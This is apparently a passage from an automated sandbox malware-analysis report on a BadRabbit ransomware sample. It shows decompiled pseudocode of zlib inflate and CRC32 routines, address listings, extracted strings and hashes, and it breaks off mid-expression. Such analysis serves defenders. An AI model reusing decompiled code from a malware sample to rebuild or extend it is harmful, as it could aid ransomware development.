				_t426[0xf] = _t248;
				_t426[0xa] =  ~(_t426[0x17] - _t267) + _t248;
				_t426[4] = _t267 - 0x101 + _t248;
				_t426[2] =  *(_t362 + 0x4c);
				_t426[3] =  *(_t362 + 0x50);
				 *_t426 = (1 <<  *(_t362 + 0x54)) - 1;
				_t426[1] = (1 <<  *(_t362 + 0x58)) - 1;
				_t170 =  *(_t362 + 0x28);
				_t343 =  *(_t362 + 0x34);
				_t426[0xd] = _t170;
				_t426[0xc] =  *(_t362 + 0x30);
				_t426[0xe] = _t343;
				_t422 =  *(_t362 + 0x38);
				_t249 =  *(_t362 + 0x3c);
				_t390 = _t426[0xb];
				_t274 = _t426[5];
				if(_t274 > _t390) {
					L2:
					if((_t390 & 0x00000003) != 0) {
						_t390 = _t390 + 1;
						_t274 = _t249;
						_t249 = _t249 + 8;
						_t170 = 0 << _t274;
						_t422 = _t422 | _t170;
						goto L2;
					}
					goto L4;
				} else {
					_t337 = _t274 + 0xb - _t390;
					_t170 = memset(_t390 + _t337 + _t337, 0, memcpy( &(_t426[7]), _t390, _t337) << 0);
					_t426 =  &(_t426[6]);
					_t274 = 0;
					_t390 =  &(_t426[7]);
					_t426[5] = _t390;
					L4:
					_t363 = _t426[0xf];
					while(1) {
						_t430 =  *0x1328010 - 2;
						if(_t430 == 0) {
							break;
						}
						if(_t430 > 0) {
							do {
								if(_t249 <= 0xf) {
									asm("lodsw");
									_t318 = _t249;
									_t249 = _t249 + 0x10;
									_t422 = _t423 | 0 << _t318;
								}
								_t171 =  *(_t426[2] + ( *_t426 & _t422) * 4);
								while(1) {
									_t250 = _t249 - _t171;
									_t423 = _t422 >> _t171;
									if(_t171 == 0) {
										asm("stosb");
										goto L22;
									}
									_t352 = _t171 >> 0x10;
									_t307 = _t171;
									if((_t171 & 0x00000010) == 0) {
										if((_t171 & 0x00000040) != 0) {
											L97:
											if((_t171 & 0x00000020) == 0) {
												_t276 = "invalid literal/length code";
												_t346 = 0x1a;
											} else {
												_t276 = 0;
												_t346 = 0xb;
											}
											L101:
											_t172 = _t426[0x16];
											if(_t276 != 0) {
												 *(_t172 + 0x18) = _t276;
											}
											 *((intOrPtr*)( *((intOrPtr*)(_t172 + 0x1c)))) = _t346;
											goto L104;
										}
										_t171 =  *(_t426[2] + (((0x00000001 << _t307) - 0x00000001 & _t423) + _t352) * 4);
										continue;
									}
									_t308 = _t307 & 0x0000000f;
									if(_t308 != 0) {
										if(_t250 < _t308) {
											asm("lodsw");
											_t335 = _t250;
											_t250 = _t250 + 0x10;
											_t423 = _t423 | 0 << _t335;
											_t308 = _t335;
										}
										_t250 = _t250 - _t308;
										_t233 = (0x00000001 << _t308) - 0x00000001 & _t423;
										_t423 = _t423 >> _t308;
										_t352 = _t352 + _t233;
									}
									_t426[6] = _t352;
									if(_t250 <= 0xf) {
										asm("lodsw");
										_t333 = _t250;
										_t250 = _t250 + 0x10;
										_t423 = _t423 | 0 << _t333;
									}
									_t198 =  *(_t426[3] + (_t426[1] & _t423) * 4);
									while(1) {
										_t357 = _t198 >> 0x10;
										_t250 = _t250 - _t198;
										_t423 = _t423 >> _t198;
										_t311 = _t198;
										if((_t198 & 0x00000010) != 0) {
											break;
										}
										if((_t198 & 0x00000040) != 0) {
											L96:
											_t276 = "invalid distance code";
											_t346 = 0x1a;
											goto L101;
										}
										_t198 =  *(_t426[3] + (((0x00000001 << _t311) - 0x00000001 & _t423) + _t357) * 4);
									}
									_t312 = _t311 & 0x0000000f;
									if(_t312 == 0) {
										if(_t357 != 1 || _t426[0xa] == _t363) {
											L38:
											_t426[0xb] = _t390;
											_t205 = _t363 - _t426[0xa];
											if(_t205 < _t357) {
												_t206 = _t426[0xd];
												_t314 =  ~_t205;
												_t407 = _t426[0xe];
												if(_t206 < _t357) {
													L100:
													_t390 = _t426[0xb];
													_t276 = "invalid distance too far back";
													_t346 = 0x1a;
													goto L101;
												}
												_t315 = _t314 + _t357;
												if(_t426[0xc] != 0) {
													_t207 = _t426[0xc];
													if(_t315 <= _t207) {
														_t409 = _t407 + _t207 - _t315;
														_t208 = _t426[6];
														if(_t208 > _t315) {
															_t208 = memcpy(_t363, _t409, _t315);
															_t426 =  &(_t426[3]);
															_t363 = _t409 + _t315 + _t315;
															_t409 = _t363 - _t357;
														}
													} else {
														_t409 = _t407 + _t426[0xd] + _t207 - _t315;
														_t320 = _t315 - _t207;
														_t208 = _t426[6];
														if(_t208 > _t320) {
															_t208 = memcpy(_t363, _t409, _t320);
															_t426 =  &(_t426[3]);
															_t363 = _t409 + _t320 + _t320;
															_t409 = _t426[0xe];
															_t322 = _t426[0xc];
															if(_t208 > _t322) {
																_t208 = memcpy(_t363, _t409, _t322);
																_t426 =  &(_t426[3]);
																_t363 = _t409 + _t322 + _t322;
																_t409 = _t363 - _t357;
															}
														}
													}
												} else {
													_t409 = _t407 + _t206 - _t315;
													_t208 = _t426[6];
													if(_t208 > _t315) {
														_t208 = memcpy(_t363, _t409, _t315);
														_t426 =  &(_t426[3]);
														_t363 = _t409 + _t315 + _t315;
														_t409 = _t363 - _t357;
													}
												}
												_t316 = _t208;
												memcpy(_t363, _t409, _t316);
												_t426 =  &(_t426[3]);
												_t363 = _t409 + _t316 + _t316;
												_t390 = _t426[0xb];
												goto L22;
											}
											_t416 = _t363 - _t357;
											_t326 = _t426[6] - 3;
											 *_t363 =  *_t416;
											_t417 = _t416 + 3;
											 *((char*)(_t363 + 1)) =  *((intOrPtr*)(_t416 + 1));
											 *((char*)(_t363 + 2)) =  *((intOrPtr*)(_t416 + 2));
											memcpy(_t363 + 3, _t417, _t326);
											_t426 =  &(_t426[3]);
											_t363 = _t417 + _t326 + _t326;
											_t390 = _t426[0xb];
										} else {
											_t383 = _t363 - 1;
											_t220 =  *_t383;
											_t329 = _t426[6] - 3;
											 *(_t383 + 1) = _t220;
											 *(_t383 + 2) = _t220;
											 *(_t383 + 3) = _t220;
											_t384 = _t383 + 4;
											memset(_t384, _t220, _t329 << 0);
											_t426 =  &(_t426[3]);
											_t363 = _t384 + _t329;
										}
										goto L22;
									}
									if(_t250 < _t312) {
										asm("lodsw");
										_t332 = _t250;
										_t250 = _t250 + 0x10;
										_t423 = _t423 | 0 << _t332;
										_t312 = _t332;
									}
									_t250 = _t250 - _t312;
									_t225 = (0x00000001 << _t312) - 0x00000001 & _t423;
									_t423 = _t423 >> _t312;
									_t357 = _t357 + _t225;
									goto L38;
								}
								L22:
							} while (_t426[4] > _t363 && _t426[5] > _t390);
							L104:
							if( *0x1328010 == 2) {
								_t250 = _t423;
							}
							_t174 = _t426[0x16];
							_t347 =  *((intOrPtr*)(_t174 + 0x1c));
							_t278 = _t250 >> 3;
							_t391 = _t390 - _t278;
							_t251 = _t250 - (_t278 << 3);
							 *(_t174 + 0xc) = _t363;
							 *(_t347 + 0x3c) = _t251;
							_t280 = _t251;
							_t252 =  &(_t426[7]);
							if(_t426[5] == _t252) {
								_t262 =  *_t174;
								_t426[5] = _t262;
								_t391 = _t391 - _t252 + _t262;
								_t426[5] = _t426[5] +  *((intOrPtr*)(_t174 + 4)) - 0xb;
							}
							 *_t174 = _t391;
							_t255 = (1 << _t280) - 1;
							if( *0x1328010 == 2) {
								asm("psrlq mm0, mm1");
								asm("movd ebp, mm0");
								asm("emms");
							}
							 *(_t347 + 0x38) = _t423 & _t255;
							_t256 = _t426[5];
							if(_t256 <= _t391) {
								 *((intOrPtr*)(_t174 + 4)) =  ~(_t391 - _t256) + 0xb;
							} else {
								 *((intOrPtr*)(_t174 + 4)) = _t256 - _t391 + 0xb;
							}
							_t257 = _t426[4];
							if(_t257 <= _t363) {
								 *((intOrPtr*)(_t174 + 0x10)) =  ~(_t363 - _t257) + 0x101;
							} else {
								 *((intOrPtr*)(_t174 + 0x10)) = _t257 - _t363 + 0x101;
							}
							asm("popfd");
							return _t174;
						}
						_push(_t170);
						_push(_t249);
						_push(_t274);
						_push(_t343);
						asm("pushfd");
						 *_t426 =  *_t426 ^ 0x00200000;
						asm("popfd");
						asm("pushfd");
						_pop(_t360);
						_t361 = _t360 ^  *_t426;
						if(_t361 == 0) {
							L15:
							 *0x1328010 = 3;
							L16:
							_pop(_t343);
							_pop(_t274);
							_pop(_t249);
							_pop(_t170);
							continue;
						}
						asm("cpuid");
						if(_t249 != 0x756e6547 || _t274 != 0x6c65746e || _t361 != 0x49656e69) {
							goto L15;
						} else {
							asm("cpuid");
							if(0xd != 6 || (_t361 & 0x00800000) == 0) {
								goto L15;
							} else {
								 *0x1328010 = 2;
								goto L16;
							}
						}
					}
					asm("emms");
					asm("movd mm0, ebp");
					_t423 = _t249;
					asm("movd mm4, dword [esp]");
					asm("movq mm3, mm4");
					asm("movd mm5, dword [esp+0x4]");
					asm("movq mm2, mm5");
					asm("pxor mm1, mm1");
					_t250 = _t426[2];
					do {
						asm("psrlq mm0, mm1");
						if(_t423 <= 0x20) {
							asm("movd mm6, ebp");
							asm("movd mm7, dword [esi]");
							_t390 = _t390 + 4;
							asm("psllq mm7, mm6");
							_t423 = _t423 + 0x20;
							asm("por mm0, mm7");
						}
						asm("pand mm4, mm0");
						asm("movd eax, mm4");
						asm("movq mm4, mm3");
						_t171 =  *(_t250 + _t170 * 4);
						while(1) {
							_t275 = _t171 & 0x000000ff;
							asm("movd mm1, ecx");
							_t423 = _t423 - _t275;
							if(_t171 == 0) {
								break;
							}
							_t345 = _t171 >> 0x10;
							if((_t171 & 0x00000010) == 0) {
								if((_t171 & 0x00000040) != 0) {
									goto L97;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t171 =  *(_t250 + ((_t275 &  *(0x13237bc + (_t171 & 0x0000000f) * 4)) + _t345) * 4);
								continue;
							}
							_t176 = _t171 & 0x0000000f;
							if(_t176 != 0) {
								asm("psrlq mm0, mm1");
								asm("movd mm1, eax");
								asm("movd ecx, mm0");
								_t423 = _t423 - _t176;
								_t345 = _t345 + (_t275 &  *(0x13237bc + _t176 * 4));
							}
							asm("psrlq mm0, mm1");
							if(_t423 <= 0x20) {
								asm("movd mm6, ebp");
								asm("movd mm7, dword [esi]");
								_t390 = _t390 + 4;
								asm("psllq mm7, mm6");
								_t423 = _t423 + 0x20;
								asm("por mm0, mm7");
							}
							asm("pand mm5, mm0");
							asm("movd eax, mm5");
							asm("movq mm5, mm2");
							_t177 =  *(_t426[3] + _t176 * 4);
							while(1) {
								_t283 = _t177 & 0x000000ff;
								_t250 = _t177 >> 0x10;
								_t423 = _t423 - _t283;
								asm("movd mm1, ecx");
								if((_t177 & 0x00000010) != 0) {
									break;
								}
								if((_t177 & 0x00000040) != 0) {
									goto L96;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t177 =  *(_t426[3] + ((_t283 &  *(0x13237bc + (_t177 & 0x0000000f) * 4)) + _t250) * 4);
							}
							_t180 = _t177 & 0x0000000f;
							if(_t180 == 0) {
								if(_t250 != 1 || _t426[0xa] == _t363) {
									L76:
									_t426[0xb] = _t390;
									_t182 = _t363 - _t426[0xa];
									if(_t182 < _t250) {
										_t183 = _t426[0xd];
										_t287 =  ~_t182;
										_t396 = _t426[0xe];
										if(_t183 < _t250) {
											goto L100;
										}
										_t288 = _t287 + _t250;
										if(_t426[0xc] != 0) {
											_t184 = _t426[0xc];
											if(_t288 <= _t184) {
												_t398 = _t396 + _t184 - _t288;
												if(_t345 > _t288) {
													_t345 = _t345 - _t288;
													memcpy(_t363, _t398, _t288);
													_t426 =  &(_t426[3]);
													_t363 = _t398 + _t288 + _t288;
													_t398 = _t363 - _t250;
												}
											} else {
												_t398 = _t396 + _t426[0xd] + _t184 - _t288;
												_t292 = _t288 - _t184;
												if(_t345 > _t292) {
													_t345 = _t345 - _t292;
													memcpy(_t363, _t398, _t292);
													_t426 =  &(_t426[3]);
													_t363 = _t398 + _t292 + _t292;
													_t398 = _t426[0xe];
													_t294 = _t426[0xc];
													if(_t345 > _t294) {
														_t345 = _t345 - _t294;
														memcpy(_t363, _t398, _t294);
														_t426 =  &(_t426[3]);
														_t363 = _t398 + _t294 + _t294;
														_t398 = _t363 - _t250;
													}
												}
											}
										} else {
											_t398 = _t396 + _t183 - _t288;
											if(_t345 > _t288) {
												_t345 = _t345 - _t288;
												memcpy(_t363, _t398, _t288);
												_t426 =  &(_t426[3]);
												_t363 = _t398 + _t288 + _t288;
												_t398 = _t363 - _t250;
											}
										}
										_t289 = _t345;
										_t170 = memcpy(_t363, _t398, _t289);
										_t426 =  &(_t426[3]);
										_t363 = _t398 + _t289 + _t289;
										_t390 = _t426[0xb];
										_t250 = _t426[2];
										goto L64;
									}
									_t405 = _t363 - _t250;
									_t298 = _t345 - 3;
									 *_t363 =  *_t405;
									_t406 = _t405 + 3;
									 *((char*)(_t363 + 1)) =  *((intOrPtr*)(_t405 + 1));
									 *((char*)(_t363 + 2)) =  *((intOrPtr*)(_t405 + 2));
									_t170 = memcpy(_t363 + 3, _t406, _t298);
									_t426 =  &(_t426[3]);
									_t363 = _t406 + _t298 + _t298;
									_t390 = _t426[0xb];
									_t250 = _t426[2];
									goto L64;
								} else {
									_t374 = _t363 - 1;
									_t192 =  *_t374;
									_t301 = _t345 - 3;
									 *(_t374 + 1) = _t192;
									 *(_t374 + 2) = _t192;
									 *(_t374 + 3) = _t192;
									_t375 = _t374 + 4;
									_t170 = memset(_t375, _t192, _t301 << 0);
									_t426 =  &(_t426[3]);
									_t363 = _t375 + _t301;
									_t250 = _t426[2];
									L64:
									if(_t426[4] <= _t363) {
										goto L104;
									}
									goto L65;
								}
							}
							asm("psrlq mm0, mm1");
							asm("movd mm1, eax");
							asm("movd ecx, mm0");
							_t423 = _t423 - _t180;
							_t250 = _t250 + (_t283 &  *(0x13237bc + _t180 * 4));
							goto L76;
						}
						_t170 = _t171 >> 0x10;
						asm("stosb");
						goto L64;
						L65:
					} while (_t426[5] > _t390);
					goto L104;
				}
			}

0x01323844
0x01323845
0x01323848
0x01323849
0x0132384d
0x01323853
0x0132385a
0x0132385e
0x01323866
0x01323869
0x0132387a
0x0132387e
0x01323882
0x0132388c
0x01323890
0x0132389f
0x013238ad
0x013238b1
0x013238b7
0x013238ba
0x013238be
0x013238c2
0x013238c6
0x013238c9
0x013238cc
0x013238d0
0x013238d6
0x013238fa
0x01323900
0x01323906
0x01323907
0x01323909
0x0132390c
0x0132390e
0x00000000
0x0132390e
0x00000000
0x013238d8
0x013238db
0x013238ee
0x013238ee
0x013238ee
0x013238f0
0x013238f4
0x01323912
0x01323912
0x01323916
0x01323916
0x0132391d
0x00000000
0x00000000
0x01323923
0x01323990
0x01323993
0x01323997
0x01323999
0x0132399b
0x013239a0
0x013239a0
0x013239ab
0x013239ae
0x013239b0
0x013239b2
0x013239b6
0x013239bb
0x013239bb
0x013239bb
0x013239d3
0x013239d6
0x013239da
0x01323ad6
0x01323dea
0x01323dec
0x01323dfa
0x01323dff
0x01323dee
0x01323dee
0x01323df3
0x01323df3
0x01323e16
0x01323e16
0x01323e1c
0x01323e1e
0x01323e1e
0x01323e24
0x00000000
0x01323e24
0x01323aec
0x00000000
0x01323aec
0x013239e0
0x013239e3
0x013239e7
0x013239ed
0x013239ef
0x013239f1
0x013239f6
0x013239f8
0x013239f8
0x01323a02
0x01323a04
0x01323a06
0x01323a08
0x01323a08
0x01323a0a
0x01323a11
0x01323a15
0x01323a17
0x01323a19
0x01323a1e
0x01323a1e
0x01323a2a
0x01323a2d
0x01323a2f
0x01323a34
0x01323a36
0x01323a38
0x01323a3c
0x00000000
0x00000000
0x01323af6
0x01323dde
0x01323dde
0x01323de3
0x00000000
0x01323de3
0x01323b0c
0x01323b0c
0x01323a42
0x01323a45
0x01323aaf
0x01323a6e
0x01323a6e
0x01323a74
0x01323a7a
0x01323b16
0x01323b1a
0x01323b1c
0x01323b22
0x01323e06
0x01323e06
0x01323e0a
0x01323e0f
0x00000000
0x01323e0f
0x01323b28
0x01323b2f
0x01323b55
0x01323b5b
0x01323b8b
0x01323b8d
0x01323b93
0x01323b97
0x01323b97
0x01323b97
0x01323b9b
0x01323b9b
0x01323b5d
0x01323b63
0x01323b65
0x01323b67
0x01323b6d
0x01323b71
0x01323b71
0x01323b71
0x01323b73
0x01323b77
0x01323b7d
0x01323b81
0x01323b81
0x01323b81
0x01323b85
0x01323b85
0x01323b7d
0x01323b6d
0x01323b31
0x01323b33
0x01323b35
0x01323b3b
0x01323b3f
0x01323b3f
0x01323b3f
0x01323b43
0x01323b43
0x01323b3b
0x01323b9d
0x01323b9f
0x01323b9f
0x01323b9f
0x01323ba1
0x00000000
0x01323ba1
0x01323a86
0x01323a88
0x01323a8d
0x01323a95
0x01323a98
0x01323a9b
0x01323aa1
0x01323aa1
0x01323aa1
0x01323aa3
0x01323ab7
0x01323ab7
0x01323abc
0x01323abe
0x01323ac1
0x01323ac4
0x01323ac7
0x01323aca
0x01323acd
0x01323acd
0x01323acd
0x01323acd
0x00000000
0x01323aaf
0x01323a49
0x01323a4f
0x01323a51
0x01323a53
0x01323a58
0x01323a5a
0x01323a5a
0x01323a64
0x01323a66
0x01323a68
0x01323a6a
0x00000000
0x01323a6a
0x013239bc
0x013239bc
0x01323e28
0x01323e2f
0x01323e31
0x01323e31
0x01323e33
0x01323e39
0x01323e3c
0x01323e3f
0x01323e44
0x01323e46
0x01323e49
0x01323e4c
0x01323e4e
0x01323e56
0x01323e5a
0x01323e5c
0x01323e60
0x01323e68
0x01323e68
0x01323e6c
0x01323e75
0x01323e7d
0x01323e7f
0x01323e82
0x01323e85
0x01323e85
0x01323e89
0x01323e8c
0x01323e92
0x01323ea5
0x01323e94
0x01323e99
0x01323e99
0x01323ea8
0x01323eae
0x01323ec7
0x01323eb0
0x01323eb8
0x01323eb8
0x01323ecd
0x01323ed2
0x01323ed2
0x01323925
0x01323926
0x01323927
0x01323928
0x01323929
0x0132392d
0x01323934
0x01323935
0x01323936
0x01323937
0x01323939
0x0132397f
0x0132397f
0x01323989
0x01323989
0x0132398a
0x0132398b
0x0132398c
0x00000000
0x0132398c
0x0132393d
0x01323945
0x00000000
0x01323957
0x0132395c
0x01323967
0x00000000
0x01323973
0x01323973
0x00000000
0x01323973
0x01323967
0x01323945
0x01323bac
0x01323bae
0x01323bb1
0x01323bb3
0x01323bb7
0x01323bba
0x01323bbf
0x01323bc2
0x01323bc5
0x01323bcc
0x01323bcc
0x01323bd2
0x01323bd4
0x01323bd7
0x01323bda
0x01323bdd
0x01323be0
0x01323be3
0x01323be3
0x01323be6
0x01323be9
0x01323bec
0x01323bef
0x01323bf2
0x01323bf2
0x01323bf5
0x01323bf8
0x01323bfc
0x00000000
0x00000000
0x01323c19
0x01323c1e
0x01323d06
0x00000000
0x00000000
0x01323d0f
0x01323d12
0x01323d1e
0x00000000
0x01323d1e
0x01323c24
0x01323c27
0x01323c29
0x01323c2c
0x01323c2f
0x01323c32
0x01323c3b
0x01323c3b
0x01323c3d
0x01323c43
0x01323c45
0x01323c48
0x01323c4b
0x01323c4e
0x01323c51
0x01323c54
0x01323c54
0x01323c5b
0x01323c5e
0x01323c61
0x01323c64
0x01323c67
0x01323c67
0x01323c6c
0x01323c6f
0x01323c71
0x01323c76
0x00000000
0x00000000
0x01323d2a
0x00000000
0x00000000
0x01323d33
0x01323d36
0x01323d46
0x01323d46
0x01323c7c
0x01323c7f
0x01323cdb
0x01323c95
0x01323c95
0x01323c9b
0x01323ca1
0x01323d52
0x01323d56
0x01323d58
0x01323d5e
0x00000000
0x00000000
0x01323d64
0x01323d6b
0x01323d8d
0x01323d93
0x01323dbf
0x01323dc3
0x01323dc5
0x01323dc7
0x01323dc7
0x01323dc7
0x01323dcb
0x01323dcb
0x01323d95
0x01323d9b
0x01323d9d
0x01323da1
0x01323da3
0x01323da5
0x01323da5
0x01323da5
0x01323da7
0x01323dab
0x01323db1
0x01323db3
0x01323db5
0x01323db5
0x01323db5
0x01323db9
0x01323db9
0x01323db1
0x01323da1
0x01323d6d
0x01323d6f
0x01323d73
0x01323d75
0x01323d77
0x01323d77
0x01323d77
0x01323d7b
0x01323d7b
0x01323d73
0x01323dcd
0x01323dcf
0x01323dcf
0x01323dcf
0x01323dd1
0x01323dd5
0x00000000
0x01323dd5
0x01323cab
0x01323cad
0x01323cb2
0x01323cba
0x01323cbd
0x01323cc0
0x01323cc6
0x01323cc6
0x01323cc6
0x01323cc8
0x01323ccc
0x00000000
0x01323ce3
0x01323ce3
0x01323ce6
0x01323ce8
0x01323ceb
0x01323cee
0x01323cf1
0x01323cf4
0x01323cf7
0x01323cf7
0x01323cf7
0x01323cf9
0x01323c02
0x01323c06
0x00000000
0x00000000
0x00000000
0x01323c06
0x01323cdb
0x01323c81
0x01323c84
0x01323c87
0x01323c8a
0x01323c93
0x00000000
0x01323c93
0x01323bfe
0x01323c01
0x00000000
0x01323c0c
0x01323c0c
0x00000000
0x01323c12

Strings

invalid literal/length code, xrefs: 01323DFA
Genu, xrefs: 0132393F
ntel, xrefs: 01323947
invalid distance code, xrefs: 01323DDE
invalid distance too far back, xrefs: 01323E0A
ineI, xrefs: 0132394F

Memory Dump Source

Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true

Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd

Similarity

API ID:
String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
API String ID: 0-3089872807
Opcode ID: ef1b29ac451cc89592a30b91f895f5550eae652ce20b06b05084a420e4af0452
Instruction ID: e314004035101c4b82e118391a869eb2c70b0421c8fef076d82d24e975d1699d
Opcode Fuzzy Hash: ef1b29ac451cc89592a30b91f895f5550eae652ce20b06b05084a420e4af0452
Instruction Fuzzy Hash: B1121A32A083658FD715EE3CC58466ABBE1BB8C318F04862DE895D7B41D379DD49C781

Uniqueness

Uniqueness Score: -1.00%

Function 013230E3 Relevance: 1.4, Strings: 1, Instructions: 200
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E013230E3(signed int _a4, signed char _a8, unsigned int _a12) {
				signed int _t161;
				signed char _t164;
				signed char _t189;
				signed int _t222;
				unsigned int _t224;
				unsigned int _t248;
				signed char* _t249;
				signed int* _t250;
				signed int _t251;

				_t189 = _a8;
				_t222 = 0xff;
				_t248 = _a12;
				_t161 =  !_a4;
				_t251 = _t248;
				while(1) {
					_a8 = _t189;
					if(_t251 == 0) {
						break;
					}
					_t251 = _t189 & 0x00000003;
					if(_t251 != 0) {
						_t161 = _t161 >> 0x00000008 ^  *(0x1324b18 + (( *_t189 & 0x000000ff ^ _t161) & _t222) * 4);
						_t189 = _t189 + 1;
						_t248 = _t248 - 1;
						continue;
					}
					break;
				}
				if(_t248 < 0x20) {
					_t249 = _a8;
				} else {
					_a4 = _t248 >> 5;
					while(1) {
						_t165 = _t161 ^  *_t189;
						_a8 = _t189 + 4;
						_t250 = _a8;
						_t241 =  *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t235 >> 0x18) * 4) ^  *(0x1325718 + (_t235 & 0x000000ff) * 4) ^ _t250[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & 